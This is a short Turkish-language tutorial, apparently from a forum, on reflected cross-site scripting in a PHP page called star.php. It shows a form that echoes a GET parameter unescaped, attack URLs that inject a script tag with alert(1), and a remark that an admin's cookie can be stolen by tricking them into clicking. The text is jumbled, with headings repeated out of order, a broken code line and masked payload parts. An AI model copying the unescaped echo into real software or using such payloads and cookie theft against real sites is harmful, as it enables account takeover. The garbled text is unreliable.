Bilmemne.Org'ta star.php diye bir dosya olsun.
Php Kodları ise :
Xss açığını yaratan hasarlı kod :
Böyle bir kodla karşılaştık diyelim :
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
star.php 'de şu kodlar olsun :
Saldırılacak şekil :
Php Kodları ise :
Kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
?>
Kod:
echo ($_GET[name_1])
Kod:
http://hedefsiteadresi.com/star.php?name_1=********>alert(1);</script>
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
star.php 'de şu kodlar olsun :
Kod:
here $_GET['Exploit
Kod:
http://www.bilmemne.org/star.php?Exploit=********>alert(1);</script>